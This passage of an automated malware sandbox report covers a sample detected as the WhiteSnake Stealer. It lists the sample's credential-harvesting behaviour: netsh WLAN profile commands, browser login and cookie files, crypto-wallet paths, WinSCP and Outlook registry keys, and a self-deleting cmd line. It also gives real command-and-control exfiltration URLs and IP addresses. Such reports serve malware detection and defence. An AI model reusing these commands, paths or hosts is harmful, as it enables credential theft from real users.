      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599875Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599766Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599656Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599547Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599438Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599313Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599188Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599063Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598946Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598839Jump to behavior
      Source: file.exeBinary or memory string: qemu'<
      Source: file.exe, 00000000.00000002.1722752489.000001D7BFCAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      .NET source code references suspicious native API functions
      Source: file.exe, l_.csReference to suspicious API methods: NativeMethods.OpenProcess(processAccessMask, bInheritHandle: false, process.Id)
      Source: file.exe, sNgu.csReference to suspicious API methods: GetProcAddress(tpov7V, b5u)
      Source: file.exe, w70oes.csReference to suspicious API methods: ReadProcessMemory(intPtr, lpBuffer.BaseAddress, array, array.Length, out var lpNumberOfBytesRead)
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3Jump to behavior
      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Uses netsh to modify the Windows network and firewall settings
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

      Stealing of Sensitive Information

      barindex
      Yara detected WhiteSnake Stealer
      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
      Found many strings related to Crypto-Wallets (likely being stolen)
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %AppData%\Electrum\wallets
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: >%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %exodus.conf.json;exodus.wallet\*.seco
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $%AppData%\Jaxx\Local Storage\leveldb
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %AppData%\Exodus
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: dC:\Users\user\AppData\Roaming\Binance
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: &%LocalAppData%\Coinomi\Coinomi\wallets
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: dC:\Users\user\AppData\Roaming\ledger live
      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
      Tries to harvest and steal WLAN passwords
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected WhiteSnake Stealer
      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
      Windows Management Instrumentation      		1
      LSASS Driver      		1
      LSASS Driver      		11
      Disable or Modify Tools      		1
      OS Credential Dumping      		1
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		1
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		2
      Obfuscated Files or Information      		1
      Credentials in Registry      		24
      System Information Discovery      		Remote Desktop Protocol2
      Data from Local System      		2
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Access Token Manipulation      		1
      Timestomp      		Security Account Manager221
      Security Software Discovery      		SMB/Windows Admin Shares1
      Email Collection      		1
      Non-Standard Port      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
      Process Injection      		1
      DLL Side-Loading      		NTDS1
      Process Discovery      		Distributed Component Object ModelInput Capture3
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      File Deletion      		LSA Secrets151
      Virtualization/Sandbox Evasion      		SSHKeylogging3
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Masquerading      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
      Virtualization/Sandbox Evasion      		DCSync1
      System Network Configuration Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Access Token Manipulation      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
      Process Injection      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550690 Sample: file.exe Startdate: 07/11/2024 Architecture: WINDOWS Score: 100 40 ip-api.com 2->40 46 Multi AV Scanner detection for domain / URL 2->46 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 9 other signatures 2->52 8 file.exe 14 6 2->8         started        signatures3 process4 dnsIp5 42 147.124.221.201, 49731, 8080 AC-AS-1US United States 8->42 44 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 8->44 38 C:\Users\user\AppData\Local\...\file.exe.log, CSV 8->38 dropped 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 8->54 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->56 58 Tries to steal Mail credentials (via file / registry access) 8->58 60 5 other signatures 8->60 13 cmd.exe 1 8->13         started        16 cmd.exe 1 8->16         started        18 cmd.exe 1 8->18         started        file6 signatures7 process8 signatures9 62 Uses netsh to modify the Windows network and firewall settings 13->62 64 Tries to harvest and steal WLAN passwords 13->64 20 netsh.exe 2 13->20         started        22 conhost.exe 13->22         started        34 2 other processes 13->34 24 netsh.exe 2 16->24         started        26 conhost.exe 16->26         started        36 2 other processes 16->36 28 conhost.exe 18->28         started        30 timeout.exe 1 18->30         started        32 chcp.com 1 18->32         started        process10

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      file.exe100%AviraHEUR/AGEN.1307453
      file.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://147.124.221.201:808020%Avira URL Cloudsafe
      http://20.78.55.47:80800%Avira URL Cloudsafe
      http://167.235.70.96:80800%Avira URL Cloudsafe
      http://147.124.221.201:80800%Avira URL Cloudsafe
      http://185.217.98.121:800%Avira URL Cloudsafe
      http://147.124.221.201:8080/sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==0%Avira URL Cloudsafe
      http://167.235.70.96:80800%VirustotalBrowse
      http://147.124.221.201:8080/sendData0%Avira URL Cloudsafe
      http://185.217.98.121:8012%VirustotalBrowse
      http://8.216.92.21:80800%Avira URL Cloudsafe
      http://20.78.55.47:80800%VirustotalBrowse
      http://65.49.205.24:80800%Avira URL Cloudsafe
      http://147.28.185.29:800%Avira URL Cloudsafe
      http://47.96.78.224:80800%Avira URL Cloudsafe
      http://209.38.221.184:80800%Avira URL Cloudsafe
      http://38.207.174.88:80800%Avira URL Cloudsafe
      http://101.126.19.171:800%Avira URL Cloudsafe
      https://185.217.98.121:4430%Avira URL Cloudsafe
      http://46.235.26.83:80800%Avira URL Cloudsafe
      http://147.124.221.201:8080/sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==&un=am9uZXM=&pc=OTgwMTA4&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA==0%Avira URL Cloudsafe
      http://67.230.176.97:80800%Avira URL Cloudsafe
      http://51.159.4.50:80800%Avira URL Cloudsafe
      http://132.145.17.167:90900%Avira URL Cloudsafe
      http://8.222.143.111:80800%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      ip-api.com
      		208.95.112.1
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://ip-api.com/line?fields=query,countryfalse
          		high
          http://147.124.221.201:8080/sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==&un=am9uZXM=&pc=OTgwMTA4&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA==true
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://147.124.221.201:80802file.exe, 00000000.00000002.1710856387.000001D7A756B000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFfile.exe, 00000000.00000002.1713584178.000001D7B74E0000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://duckduckgo.com/ac/?q=file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://185.217.98.121:80file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                • 12%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://138.2.92.67:443file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://167.235.70.96:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://20.78.55.47:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://107.161.20.142:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://5.196.181.135:443file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000000.00000002.1713584178.000001D7B740A000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://101.43.160.136:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://192.99.196.191:443file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://168.138.211.88:8099file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://18.228.80.130:80file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://147.124.221.201:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1710856387.000001D7A756B000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installfile.exe, 00000000.00000002.1713584178.000001D7B73E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://147.124.221.201:8080/sendDatafile.exe, 00000000.00000002.1710856387.000001D7A756B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ip-api.comfile.exe, 00000000.00000002.1710856387.000001D7A7397000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://147.124.221.201:8080/sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==file.exe, 00000000.00000002.1710856387.000001D7A756B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://185.217.98.121:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://8.219.110.16:9999file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://8.216.92.21:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://65.49.205.24:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://47.96.78.224:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://129.151.109.160:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://147.28.185.29:80file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/soap/encoding/file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://154.9.207.142:443file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://209.38.221.184:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.w3.orfile.exe, 00000000.00000002.1710856387.000001D7A758C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://206.166.251.4:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://194.164.198.113:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000000.00000002.1713584178.000001D7B740A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://38.207.174.88:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://ip-api.com/line?fields=queryfile.exe, 00000000.00000002.1710856387.000001D7A7397000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://159.203.174.113:8090file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://101.126.19.171:80file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.ecosia.org/newtab/file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000002.1713584178.000001D7B74E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://185.217.98.121:443file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://46.235.26.83:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://116.202.101.219:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://38.60.191.38:80file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://67.230.176.97:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://132.145.17.167:9090file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/wsdl/file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://51.159.4.50:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://8.222.143.111:8080file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://support.mozilla.orgfile.exe, 00000000.00000002.1713584178.000001D7B74D0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1713584178.000001D7B74D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesfile.exe, 00000000.00000002.1713584178.000001D7B73E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://41.87.207.180:9090file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        208.95.112.1
                                                                                        		ip-api.comUnited States
                                                                                        		53334TUT-ASUSfalse
                                                                                        147.124.221.201
                                                                                        		unknownUnited States
                                                                                        		1432AC-AS-1UStrue

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1550690
                                                                                        Start date and time:2024-11-07 03:06:07 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 2m 40s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:15
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:file.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@26/3@1/2
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 70%
                                                                                        • Number of executed functions: 17
                                                                                        • Number of non-executed functions: 7
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Stop behavior analysis, all processes terminated

                                                                                        Warnings

                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        21:06:59API Interceptor11x Sleep call for process: file.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        208.95.112.1file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                        • ip-api.com/line?fields=query,country
                                                                                        4tuMnSBgXFwIxMP.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        20092837.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        tfz7ikR76n.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        173088012436cb09e4ff67d5495bafb892243773781ebe8236073aca4dd15efcce792bb9ed419.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        aviso de transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
